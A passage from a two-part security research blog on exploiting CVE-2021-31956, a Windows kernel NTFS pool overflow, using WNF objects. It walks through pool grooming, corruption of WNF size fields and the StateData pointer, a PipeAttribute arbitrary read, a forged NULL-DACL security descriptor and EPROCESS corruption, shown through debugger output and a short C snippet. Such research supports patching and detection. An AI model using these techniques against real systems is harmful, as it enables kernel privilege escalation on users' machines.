There’s also an API call which does this called NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData in turn ends up free’ing our allocation.

Whilst researching this area, I was able to reuse the free’d chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists as in my case from empirical testing, then I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data, itself and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize is to denote the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

View this gist on GitHub

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some output as an example from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that the both the NTFS vulnerable chunk and the WNF chunk can be positioned with other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.

Relative Memory Write

So what about writing data outside the bounds?

View this gist on GitHub

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

View this gist on GitHub

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

So at this point its worth noting that the relative write has not really given us anything more than we had already with the NTFS overflow. However, as the data can be both read and written back using this technique then it opens up the ability to read data, modify certain parts of it and write it back.

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow, but this wrong assumption lead to me trying to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize of a 0x30 sized chunk WNF _POOL_HEADER.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks for when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is free’d using our controlled free, we can force the chunks address to be stored within the wrong lookaside list for the size.

Then we can reallocate another object of a different size, matching the size we used when corrupting the chunk now placed on that lookaside list, to take the place of this object.

Finally, we can then trigger corruption again and therefore corrupt our more interesting object.

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative write’s.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagramatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back after this minor Pipe Attribute detour and with the realisation that I could actually control the size of the vulnerable NTFS chunks. I started to investigate if it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur in, then the bounds checking within the ExpWnfWriteStateData would be successful.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

View this gist on GitHub

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore can end up with our desired memory layout with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then after our NTFS extended attributes overflow has occurred and we have overwritten a number of fields:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address. At this was used within the in the wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name queried from.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb

The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope the current server Silo Globals or the Server Silo Globals are offset into to obtain v10 and then this used as the Sequence which is incremented by 1 each time.

View this gist on GitHub

Then in order to lookup a name instance the following code is taken:

View this gist on GitHub

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

View this gist on GitHub

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateName‘s of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide the fake the security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Lets just make the DACL NULL, so that the everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that when I set the StateData pointer to be 0x6161616161616161 a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819 which is STATUS_ACCESS_VIOLATION is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and with conditional breakpoints lead to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will either leverage to perform a data-only based privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following steps were needing to be taken:

1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required.
2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker controlled data.

At this point typical approaches would be to either:

1) Target KTHREAD structures PreviousMode member

2) Target the EPROCESS token

These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitive. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

NCC Group Research

Alex Plaskett

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger
An introduction into the Windows Notification Framework (WNF) from an exploitation perspective
Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

Exploitation without the CVE-2021-31955 information disclosure
Enabling better exploit primitives through PreviousMode
Reliability, stability and exploit clean-up
Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

